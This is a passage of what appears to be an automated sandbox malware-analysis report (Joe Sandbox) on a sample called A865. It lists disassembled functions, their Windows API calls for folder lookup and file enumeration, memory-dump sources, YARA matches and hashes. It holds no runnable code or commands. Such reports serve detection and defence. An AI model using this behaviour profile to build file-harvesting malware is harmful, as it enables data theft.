                                                            • Snapshot File: hcaresult_2_2_400000_A865.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: SystemTimelstrcpy
                                                            • String ID: cI@$cI@
                                                            • API String ID: 62757014-1697673767
                                                            • Opcode ID: 728e3afec194442a0a20c9b4cf47b2a0a0f7365ad80767aaeb7a96b2b5f46ac6
                                                            • Instruction ID: 15f3dfc6f8d56a301bf8b2a7a9260479b6db203ca669f730be279af5ebf73ee3
                                                            • Opcode Fuzzy Hash: 728e3afec194442a0a20c9b4cf47b2a0a0f7365ad80767aaeb7a96b2b5f46ac6
                                                            • Instruction Fuzzy Hash: 7111E971D00008AFCB04EFA9C8919EE77B9EF58314F04C05EF01667241DF38AA86CBA6
                                                            Function 00415050 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 48stringCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 00418DE0: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,000003E8), ref: 00418E0B
                                                            • lstrcatA.KERNEL32(?,00000000,?,00000104), ref: 0041508A
                                                            • lstrcatA.KERNEL32(?,0087A6F8), ref: 004150A8
                                                              • Part of subcall function 00414910: wsprintfA.USER32 ref: 0041492C
                                                              • Part of subcall function 00414910: FindFirstFileA.KERNEL32(?,?), ref: 00414943
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.3068887934.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000002.00000002.3068887934.00000000004B1000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.3068887934.00000000004BD000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.3068887934.00000000004E2000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.3068887934.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.3068887934.000000000065C000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_400000_A865.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: lstrcat$FileFindFirstFolderPathwsprintf
                                                            • String ID: aA
                                                            • API String ID: 2699682494-2567749500
                                                            • Opcode ID: d64dcdbc5a5b078ecf4a674937750308087945107cc9d2085dbcd85f67f2e6ce
                                                            • Instruction ID: 27646669aa04729862e240b26620d37997e147c17b59a732ce93ef494e7ce50b
                                                            • Opcode Fuzzy Hash: d64dcdbc5a5b078ecf4a674937750308087945107cc9d2085dbcd85f67f2e6ce
                                                            • Instruction Fuzzy Hash: B801D6BAA4020877C714FBB0DC42EEE333CAB55304F00415DB68A570D1EE789AC88BA6
                                                            Function 022DBCE7 Relevance: 5.3, APIs: 4, Instructions: 284stringCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 022EA9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 022EA9EF
                                                              • Part of subcall function 022EAC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FBC,00420E17), ref: 022EAC2C
                                                              • Part of subcall function 022EAC17: lstrcpy.KERNEL32(00000000), ref: 022EAC6B
                                                              • Part of subcall function 022EAC17: lstrcat.KERNEL32(00000000,00000000), ref: 022EAC79
                                                              • Part of subcall function 022EAB87: lstrcpy.KERNEL32(00000000,?), ref: 022EABD9
                                                              • Part of subcall function 022EAB87: lstrcat.KERNEL32(00000000), ref: 022EABE9
                                                              • Part of subcall function 022EAB07: lstrcpy.KERNEL32(?,00420E17), ref: 022EAB6C
                                                              • Part of subcall function 022EAA07: lstrcpy.KERNEL32(?,00000000), ref: 022EAA4D
                                                              • Part of subcall function 022DA077: memcmp.MSVCRT(?,00421264,00000003), ref: 022DA094
                                                            • lstrlen.KERNEL32(00000000), ref: 022DBF06
                                                              • Part of subcall function 022E9097: LocalAlloc.KERNEL32(00000040,-00000001), ref: 022E90B9
                                                            • StrStrA.SHLWAPI(00000000,004213E0), ref: 022DBF34
                                                            • lstrlen.KERNEL32(00000000), ref: 022DC00C
                                                            • lstrlen.KERNEL32(00000000), ref: 022DC020
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.3069504910.00000000022D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022D0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_22d0000_A865.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: lstrcpy$lstrlen$lstrcat$AllocLocalmemcmp
                                                            • String ID:
                                                            • API String ID: 1440504306-0
                                                            • Opcode ID: 9e08ee45ebc43fe706c0c8ad989736c962bf943befa7584f1b5ac42d019a3d06
                                                            • Instruction ID: c1893c81ce1cd6680f137be74c8542ccca9c32687fbe4f244ae07081069c2ad0
                                                            • Opcode Fuzzy Hash: 9e08ee45ebc43fe706c0c8ad989736c962bf943befa7584f1b5ac42d019a3d06
                                                            • Instruction Fuzzy Hash: AAB1FB71920318ABCF18EBE4DD95EFE733AAF64304F804159E507A6194EF386A48DF61
                                                            Function 00413BDB Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16filestringCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • lstrcatA.KERNEL32(?,?,?,00000104,?,00000104), ref: 00413935
                                                            • StrCmpCA.SHLWAPI(?,00420F70), ref: 00413947
                                                            • StrCmpCA.SHLWAPI(?,00420F74), ref: 0041395D
                                                            • FindNextFileA.KERNEL32(000000FF,?), ref: 00413C67
                                                            • FindClose.KERNEL32(000000FF), ref: 00413C7C
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.3068887934.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000002.00000002.3068887934.00000000004B1000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.3068887934.00000000004BD000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.3068887934.00000000004E2000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.3068887934.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.3068887934.000000000065C000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_400000_A865.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Find$CloseFileNextlstrcat
                                                            • String ID: !=A
                                                            • API String ID: 3840410801-2919091325
                                                            • Opcode ID: 28feb7c8be81de4ab4b55bfcc7f9479259f5a9bafbd7cecf7f5c2433705f41d5
                                                            • Instruction ID: 20ec2b31cb4d991c835852fde49fc2354676703d0d5a57c203257a76fc367b8d
                                                            • Opcode Fuzzy Hash: 28feb7c8be81de4ab4b55bfcc7f9479259f5a9bafbd7cecf7f5c2433705f41d5
                                                            • Instruction Fuzzy Hash: FCD012756401096BCB20EF90DD589EA7779DB55305F0041C9B40EA6150EB399B818B95
                                                            Function 022E51A7 Relevance: 5.1, APIs: 4, Instructions: 70stringCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 022E9047: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 022E9072
                                                            • lstrcat.KERNEL32(?,00000000), ref: 022E51E1
                                                            • lstrcat.KERNEL32(?,00421070), ref: 022E51FE
                                                            • lstrcat.KERNEL32(?,0064A5F8), ref: 022E5212
                                                            • lstrcat.KERNEL32(?,00421074), ref: 022E5224
                                                              • Part of subcall function 022E4B77: wsprintfA.USER32 ref: 022E4B93
                                                              • Part of subcall function 022E4B77: FindFirstFileA.KERNEL32(?,?), ref: 022E4BAA
                                                              • Part of subcall function 022E4B77: StrCmpCA.SHLWAPI(?,00420FDC), ref: 022E4BD8
                                                              • Part of subcall function 022E4B77: StrCmpCA.SHLWAPI(?,00420FE0), ref: 022E4BEE
                                                              • Part of subcall function 022E4B77: FindNextFileA.KERNEL32(000000FF,?), ref: 022E4DE4
                                                              • Part of subcall function 022E4B77: FindClose.KERNEL32(000000FF), ref: 022E4DF9
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.3069504910.00000000022D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022D0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_22d0000_A865.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: lstrcat$Find$File$CloseFirstFolderNextPathwsprintf
                                                            • String ID:
                                                            • API String ID: 2667927680-0
                                                            • Opcode ID: fea607eff97497eb4fd5309f6b34a87d5e7f8ff3753410a5b2e417b1bb1efa56
                                                            • Instruction ID: 77f1be27e664de97440a867420ffa9e55294e441ca1e3c15efdf699cc591b17a
                                                            • Opcode Fuzzy Hash: fea607eff97497eb4fd5309f6b34a87d5e7f8ff3753410a5b2e417b1bb1efa56
                                                            • Instruction Fuzzy Hash: 9621DA7AA503087BDB14FBF0DC45EED337EAB55300F804189B68A92194DE7496C9CFA2
                                                            Function 022E94C7 Relevance: 5.0, APIs: 4, Instructions: 41stringCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.3069504910.00000000022D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022D0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_22d0000_A865.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: lstrcpynlstrlenwsprintf
                                                            • String ID:
                                                            • API String ID: 1206339513-0
                                                            • Opcode ID: bda2825dd20141c14e66db048f7389e73ec0fb40efc247105e9df97f2adce381
                                                            • Instruction ID: fc3a89c7cd4047c8deef02a0682037777e6a97a3e554c36471a3bf2d0a72fd53
                                                            • Opcode Fuzzy Hash: bda2825dd20141c14e66db048f7389e73ec0fb40efc247105e9df97f2adce381
                                                            • Instruction Fuzzy Hash: 1301DA79540109FFCB04DFECD998EAE7BBAEF49394F108148F90A9B305C635AA40DB95